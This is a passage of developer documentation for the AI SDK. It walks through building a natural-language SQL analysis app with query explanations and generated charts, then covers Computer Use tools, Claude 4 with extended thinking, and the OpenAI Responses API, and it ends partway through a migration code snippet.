Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.
If the user asks for 'over time' data, return by year.
When searching for UK or USA, write out United Kingdom or United States respectively.
EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.
There are several important elements of this prompt:
- Schema description helps the model understand exactly what data fields to work with
- Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
- Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
- Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
- The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
- Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted
This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.
Create a Server Action
With the prompt done, let's create a Server Action.
Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).
Add a new action. This action should be asynchronous and take in one parameter - the natural language query.
/* ...rest of the file... */
export const generateQuery = async (input: string) => {};
In this action, you'll use the generateObject function from the AI SDK which allows you to constrain the model's output to a pre-defined schema. This process, sometimes called structured output, ensures the model returns only the SQL query without any additional prefixes, explanations, or formatting that would require manual parsing.
/* ...other imports... */
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
/* ...rest of the file... */
export const generateQuery = async (input: string) => {
'use server';
try {
const result = await generateObject({
model: openai('gpt-4o'),
system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
schema: z.object({
query: z.string(),
}),
});
return result.object.query;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
Note that you are constraining the output to a single string field called query using zod, a TypeScript schema validation library. This will ensure the model only returns the SQL query itself. The resulting generated query is then returned.
Update the frontend
With the Server Action in place, you can now update the frontend to call this action when the user submits a natural language query. In the root page (app/page.tsx), you should see a handleSubmit function that is called when the user submits a query.
Import the generateQuery function and call it with the user's input.
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now, when the user submits a natural language query (ie. "how many unicorns are from San Francisco?"), that question will be sent to your newly created Server Action. The Server Action will call the model, passing in your system prompt and the user's query, and return the generated SQL query in a structured format. This query is then passed to the runGeneratedSQLQuery action to run the query against your database. The results are then saved in local state and displayed to the user.
Save the file, make sure the dev server is running, and then head to localhost:3000 in your browser. Try submitting a natural language query and see the generated SQL query and results. You should see a SQL query generated and displayed under the input field. You should also see the results of the query displayed in a table below the input field.
Try clicking the SQL query to see the full query if it's too long to display in the input field. You should see a button on the right side of the input field with a question mark icon. Clicking this button currently does nothing, but you'll add the "explain query" functionality to it in the next step.
Explain SQL Queries
Next, let's add the ability to explain SQL queries in plain English. This feature helps users understand how the generated SQL query works by breaking it down into logical sections. As with the SQL query generation, you'll need a prompt to guide the model when explaining queries.
Let's craft a prompt for the explain query functionality:
You are a SQL (postgres) expert. Your job is to explain to the user the SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
id SERIAL PRIMARY KEY,
company VARCHAR(255) NOT NULL UNIQUE,
valuation DECIMAL(10, 2) NOT NULL,
date_joined DATE,
country VARCHAR(255) NOT NULL,
city VARCHAR(255) NOT NULL,
industry VARCHAR(255) NOT NULL,
select_investors TEXT NOT NULL
);
When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.
Like the prompt for generating SQL queries, you provide the model with the schema of the database. Additionally, you provide an example of what each section of the query might look like. This helps the model understand the structure of the query and how to break it down into logical sections.
Create a Server Action
Add a new Server Action to generate explanations for SQL queries.
This action takes two parameters - the original natural language input and the generated SQL query.
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateObject({
model: openai('gpt-4o'),
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
});
return result.object;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
This action uses the generateObject function again. However, you haven't defined the schema yet. Let's define it in another file so it can also be used as a type in your components.
Update your lib/types.ts file to include the schema for the explanations:
import { z } from 'zod';
/* ...rest of the file... */
export const explanationSchema = z.object({
section: z.string(),
explanation: z.string(),
});
export type QueryExplanation = z.infer<typeof explanationSchema>;
This schema defines the structure of the explanation that the model will generate. Each explanation will have a section and an explanation. The section is the part of the query being explained, and the explanation is the plain English explanation of that section. Go back to your actions.ts file and import and use the explanationSchema:
// other imports
import { explanationSchema } from '@/lib/types';
/* ...rest of the file... */
export const explainQuery = async (input: string, sqlQuery: string) => {
'use server';
try {
const result = await generateObject({
model: openai('gpt-4o'),
system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.
User Query:
${input}
Generated SQL Query:
${sqlQuery}`,
schema: explanationSchema,
output: 'array',
});
return result.object;
} catch (e) {
console.error(e);
throw new Error('Failed to generate query');
}
};
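Because the action sets output: 'array', result.object is an array of QueryExplanation objects. For the example query used in the prompt above, the result might look roughly like this (values are illustrative):
import type { QueryExplanation } from '@/lib/types';
// Possible result for "SELECT * FROM unicorns limit 20":
const explanations: QueryExplanation[] = [
  { section: 'SELECT *', explanation: 'Return every column of each matching row.' },
  { section: 'FROM unicorns', explanation: 'Read rows from the unicorns table.' },
  { section: 'LIMIT 20', explanation: 'Return at most 20 rows.' },
];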
Update query viewer
Next, update the query-viewer.tsx component to display these explanations. The handleExplainQuery function is called every time the user clicks the question icon button on the right side of the query. Let's update this function to use the new explainQuery action:
/* ...other imports... */
import { explainQuery } from '@/app/actions';
/* ...rest of the component... */
const handleExplainQuery = async () => {
setQueryExpanded(true);
setLoadingExplanation(true);
const explanations = await explainQuery(inputValue, activeQuery);
setQueryExplanations(explanations);
setLoadingExplanation(false);
};
/* ...rest of the component... */
Now when users click the explanation button (the question mark icon), the component will:
- Show a loading state
- Send the active SQL query and the user's natural language query to your Server Action
- The model will generate an array of explanations
- The explanations will be set in the component state and rendered in the UI
Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!
Visualizing query results
Finally, let's render the query results visually in a chart. There are two approaches you could take:
- Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
- Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model to return the full dataset.
Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.
Generate the chart configuration
For this feature, you'll create a Server Action that takes the query results and the user's original natural language query to determine the best visualization approach. Your application is already set up to use shadcn charts (which uses Recharts under the hood) so the model will need to generate:
- Chart type (bar, line, area, or pie)
- Axis mappings
- Visual styling
Let's start by defining the schema for the chart configuration in lib/types.ts:
/* ...rest of the file... */
export const configSchema = z
.object({
description: z
.string()
.describe(
'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
),
takeaway: z.string().describe('What is the main takeaway from the chart?'),
type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
title: z.string(),
xKey: z.string().describe('Key for x-axis or category'),
yKeys: z
.array(z.string())
.describe(
'Key(s) for y-axis values; this is typically the quantitative column',
),
multipleLines: z
.boolean()
.describe(
'For line charts only: whether the chart is comparing groups of data.',
)
.optional(),
measurementColumn: z
.string()
.describe(
'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
)
.optional(),
lineCategories: z
.array(z.string())
.describe(
'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
)
.optional(),
colors: z
.record(
z.string().describe('Any of the yKeys'),
z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
)
.describe('Mapping of data keys to color values for chart elements')
.optional(),
legend: z.boolean().describe('Whether to show legend'),
})
.describe('Chart configuration object');
export type Config = z.infer<typeof configSchema>;
This schema makes extensive use of Zod's .describe() function to give the model extra context about each of the keys you expect in the chart configuration. This will help the model understand the purpose of each key and generate more accurate results.
Another important technique to note here is that you are defining description and takeaway fields. Not only are these useful for the user to quickly understand what the chart means and what they should take away from it, but they also force the model to generate a description of the data first, before it attempts to generate configuration attributes like axes and columns. This will help the model generate more accurate and relevant chart configurations.
Create the Server Action
Create a new action in app/actions.ts:
/* ...other imports... */
import { Config, configSchema, explanationSchema, Result } from '@/lib/types';
/* ...rest of the file... */
export const generateChartConfig = async (
results: Result[],
userQuery: string,
) => {
'use server';
try {
const { object: config } = await generateObject({
model: openai('gpt-4o'),
system: 'You are a data visualization expert.',
prompt: `Given the following data from a SQL query result, generate the chart config that best visualises the data and answers the user's query.
For multiple groups use multi-lines.
Here is an example complete config:
export const chartConfig = {
type: "pie",
xKey: "month",
yKeys: ["sales", "profit", "expenses"],
colors: {
sales: "#4CAF50", // Green for sales
profit: "#2196F3", // Blue for profit
expenses: "#F44336" // Red for expenses
},
legend: true
}
User Query:
${userQuery}
Data:
${JSON.stringify(results, null, 2)}`,
schema: configSchema,
});
// Override with shadcn theme colors
const colors: Record<string, string> = {};
config.yKeys.forEach((key, index) => {
colors[key] = `hsl(var(--chart-${index + 1}))`;
});
const updatedConfig = { ...config, colors };
return { config: updatedConfig };
} catch (e) {
console.error(e);
throw new Error('Failed to generate chart suggestion');
}
};
Update the chart component
With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.
Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery, generateChartConfig } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
const { config } = await generateChartConfig(companies, question);
setChartConfig(config);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now when users submit queries, the application will:
- Generate and run the SQL query
- Display the table results
- Generate a chart configuration for the results
- Allow toggling between table and chart views
Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.
Next steps
You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.
You could, for example, extend the application to use your own data sources or add more advanced features like customizing the chart configuration schema to support more chart types and options. You could also add more complex SQL query generation capabilities.
title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']
Get started with Computer Use
With the release of Computer Use in Claude 3.5 Sonnet, you can now direct AI models to interact with computers like humans do - moving cursors, clicking buttons, and typing text. This capability enables automation of complex tasks while leveraging Claude's advanced reasoning abilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Anthropic's Claude alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more. In this guide, you will learn how to integrate Computer Use into your AI SDK applications.
Computer Use
Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:
- Moving the cursor
- Clicking buttons
- Typing text
- Taking screenshots
- Reading screen content
How It Works
Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:
- Start with a prompt and tools: add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model, for example: "save an image to your downloads folder."
- Select the right tool: the model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
- Execute the action and return results: the AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
- Complete the task through iterations: Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.
Available Tools
There are three main tools available in the Computer Use API:
- Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
- Text Editor Tool: Provides functionality for viewing and editing text files
- Bash Tool: Allows execution of bash commands
Implementation Considerations
Computer Use tools in the AI SDK are predefined interfaces that require your own implementation of the execution layer. While the SDK provides the type definitions and structure for these tools, you need to:
- Set up a controlled environment for Computer Use execution
- Implement core functionality like mouse control and keyboard input
- Handle screenshot capture and processing
- Set up rules and limits for how Claude can interact with your system
The recommended approach is to start with Anthropic's reference implementation, which provides:
- A containerized environment configured for safe Computer Use
- Ready-to-use (Python) implementations of Computer Use tools
- An agent loop for API interaction and tool execution
- A web interface for monitoring and control
This reference implementation serves as a foundation to understand the requirements before building your own custom solution.
Getting Started with the AI SDK
First, ensure you have the AI SDK and Anthropic AI SDK provider installed:
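<Snippet text={['pnpm add ai @ai-sdk/anthropic']} />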
You can add Computer Use to your AI SDK applications using provider-defined tools. These tools accept various input parameters (like display height and width in the case of the computer tool) and then require that you define an execute function.
Here's how you could set up the Computer Tool with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';
const computerTool = anthropic.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
execute: async ({ action, coordinate, text }) => {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: getScreenshot(),
};
}
default: {
return executeComputerAction(action, coordinate, text);
}
}
},
experimental_toToolResultContent(result) {
return typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'image', data: result.data, mediaType: 'image/png' }];
},
});
The computerTool handles two main actions: taking screenshots via getScreenshot() and executing computer actions like mouse movements and clicks through executeComputerAction(). Remember, you have to implement this execution logic (eg. the getScreenshot and executeComputerAction functions) to handle the actual computer interactions. The execute function should handle all low-level interactions with the operating system.
Finally, to send tool results back to the model, use the experimental_toToolResultContent() function to convert text and image responses into a format the model can process. The AI SDK includes experimental support for these multi-modal tool results when using Anthropic's models.
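The getScreenshot and executeComputerAction helpers imported above are yours to write. As a shape reference only, here is a stubbed utils/computer-use module with the signatures the example assumes; the bodies are placeholders, not a working automation layer:
// utils/computer-use.ts — placeholder implementations. Replace the bodies
// with calls into your controlled environment (e.g. a sandboxed VM).
// Return a base64-encoded PNG of the current screen for the model to read.
export function getScreenshot(): string {
  throw new Error('Not implemented: capture and base64-encode a screenshot');
}
// Perform a mouse/keyboard action and return a textual result for the model.
export function executeComputerAction(
  action: string,
  coordinate: number[] | undefined,
  text: string | undefined,
): string {
  // e.g. dispatch on `action` to mouse_move / left_click / type handlers
  throw new Error(`Not implemented: ${action}`);
}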
Using Computer Tools with Text Generation
Once your tool is defined, you can use it with both the generateText and streamText functions.
For one-shot text generation, use generateText:
const result = await generateText({
model: anthropic('claude-3-5-sonnet-20241022'),
prompt: 'Move the cursor to the center of the screen and take a screenshot',
tools: { computer: computerTool },
});
console.log(result.text);
For streaming responses, use streamText to receive updates in real-time:
const result = streamText({
model: anthropic('claude-3-5-sonnet-20241022'),
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
});
for await (const chunk of result.textStream) {
console.log(chunk);
}
Configure Multi-Step (Agentic) Generations
To allow the model to perform multiple steps without user intervention, specify a maxSteps value. This will automatically send any tool results back to the model to trigger a subsequent generation:
const stream = streamText({
model: anthropic('claude-3-5-sonnet-20241022'),
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
maxSteps: 10, // experiment with this value based on your use case
});
Combine Multiple Tools
You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:
import { execSync } from 'node:child_process';
const computerTool = anthropic.tools.computer_20241022({
...
});
const bashTool = anthropic.tools.bash_20241022({
execute: async ({ command, restart }) => execSync(command).toString()
});
const textEditorTool = anthropic.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
old_str,
view_range
}) => {
// Delegate file operations to your implementation based on `command`
return executeTextEditorFunction({
  command,
  path,
  fileText: file_text,
  insertLine: insert_line,
  newStr: new_str,
  oldStr: old_str,
  viewRange: view_range
});
}
});
const response = await generateText({
model: anthropic("claude-3-5-sonnet-20241022"),
prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
computer: computerTool,
bash: bashTool,
str_replace_editor: textEditorTool,
},
});
Best Practices for Computer Use
To get the best results when using Computer Use:
- Specify simple, well-defined tasks with explicit instructions for each step
- Prompt Claude to verify outcomes through screenshots
- Use keyboard shortcuts when UI elements are difficult to manipulate
- Include example screenshots for repeatable tasks
- Provide explicit tips in system prompts for known tasks
Security Measures
Remember, Computer Use is a beta feature. Please be aware that it poses unique risks that are distinct from standard API features or chat interfaces. These risks are heightened when using Computer Use to interact with the internet. To minimize risks, consider taking precautions such as:
- Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
- Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
- Limit internet access to an allowlist of domains to reduce exposure to malicious content.
- Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.
title: Get started with Claude 4 description: Get started with Claude 4 using the AI SDK. tags: ['getting-started']
Get started with Claude 4
With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 4 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 4
Claude 4 is Anthropic's most advanced model family to date, offering exceptional capabilities across reasoning, instruction following, coding, and knowledge tasks. Available in two variants—Sonnet and Opus—Claude 4 delivers state-of-the-art performance with enhanced reliability and control. Claude 4 builds on the extended thinking capabilities introduced in Claude 3.7, allowing for even more sophisticated problem-solving through careful, step-by-step reasoning.
Claude 4 excels at complex reasoning, code generation and analysis, detailed content creation, and agentic capabilities, making it ideal for powering sophisticated AI workflows, customer-facing agents, and applications requiring nuanced understanding and responses. Claude Opus 4 is an excellent coding model, leading on SWE-bench (72.5%) and Terminal-bench (43.2%), with the ability to sustain performance on long-running tasks that require focused effort and thousands of steps. Claude Sonnet 4 significantly improves on Sonnet 3.7, excelling in coding with 72.7% on SWE-bench while balancing performance and efficiency.
Prompt Engineering for Claude 4 Models
Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:
- Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
- Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
- Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.
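As an illustration (the prompt text is made up for this example), a request that follows these practices might look like:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
  model: anthropic('claude-4-sonnet-20250514'),
  // Explicit instructions, the motivation behind them, and a positive example:
  system:
    'Rewrite each changelog entry as one sentence in the imperative mood. ' +
    'The changelog is scanned by busy developers, so keep entries short. ' +
    'Good example: "Add streaming support to generateText."',
  prompt: 'Rewrite: "we added the ability for text to be streamed"',
});
console.log(text);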
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude Sonnet 4 with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: anthropic('claude-4-sonnet-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);
Reasoning Ability
Claude 4 enhances the extended thinking capabilities first introduced in Claude 3.7 Sonnet—the ability to solve complex problems with careful, step-by-step reasoning. Additionally, both Opus 4 and Sonnet 4 can now use tools during extended thinking, allowing Claude to alternate between reasoning and tool use to improve responses. You can enable extended thinking using the thinking provider option and specifying a thinking budget in tokens. For interleaved thinking (where Claude can think in between tool calls) you'll need to enable a beta feature using the anthropic-beta header:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoning, reasoningDetails } = await generateText({
model: anthropic('claude-4-sonnet-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicProviderOptions,
},
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
});
console.log(text); // text response
console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With four main hooks — useChat, useCompletion, useObject, and useAssistant — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
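<Snippet text={['pnpm add ai @ai-sdk/anthropic @ai-sdk/react']} />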
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const result = streamText({
model: anthropic('claude-4-sonnet-20250514'),
messages,
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicProviderOptions,
},
});
return result.toDataStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
export default function Page() {
const { messages, input, handleInputChange, handleSubmit, error } = useChat();
return (
<div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
<div className="flex-1 overflow-y-auto space-y-4 mb-4">
{messages.map(message => (
<div
key={message.id}
className={`p-3 rounded-lg ${
message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
}`}
>
<p className="font-semibold">
{message.role === 'user' ? 'You' : 'Claude 4'}
</p>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return (
<div key={index} className="mt-1">
{part.text}
</div>
);
}
if (part.type === 'reasoning') {
return (
<pre
key={index}
className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
>
<details>
<summary className="cursor-pointer">
View reasoning
</summary>
{part.details.map(detail =>
detail.type === 'text' ? detail.text : '<redacted>',
)}
</details>
</pre>
);
}
})}
</div>
))}
</div>
<form onSubmit={handleSubmit} className="flex gap-2">
<input
name="prompt"
value={input}
onChange={handleInputChange}
className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
placeholder="Ask Claude 4 something..."
/>
<button
type="submit"
className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
>
Send
</button>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Claude 4 Model Variants
Claude 4 is available in two variants, each optimized for different use cases:
- Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
- Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: OpenAI Responses API description: Get started with the OpenAI Responses API using the AI SDK. tags: ['getting-started', 'agents']
Get started with OpenAI Responses API
With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI Responses API
OpenAI recently released the Responses API, a brand new way to build applications on OpenAI's platform. The new API offers a way to persist chat history, a web search tool for grounding LLM responses, file search tool for finding relevant files, and a computer use tool for building agents that can interact with and operate computers. Let's explore how to use the Responses API with the AI SDK.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai.responses('gpt-4o'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
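Because the result is typed from the schema, you get autocomplete and compile-time checks when consuming it:
// `object` is fully typed against the zod schema above:
console.log(object.recipe.name);
for (const ingredient of object.recipe.ingredients) {
  console.log(`${ingredient.amount} ${ingredient.name}`);
}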
Using Tools with the AI SDK
The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Web Search Tool
The Responses API introduces a built-in web search tool for grounding responses. With this tool, the model can access the internet to find relevant information for its responses.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview(),
},
});
console.log(result.text);
console.log(result.sources);
The web search tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview({
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
});
console.log(result.text);
console.log(result.sources);
Using Persistence
With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message, while OpenAI can access the entire chat history:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result1 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Invent a new holiday and describe its traditions.',
});
const result2 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
previousResponseId: result1.providerMetadata?.openai.responseId as string,
},
},
});
Migrating from Completions API
Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is simple: change your model instance from openai(modelId) to openai.responses(modelId):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
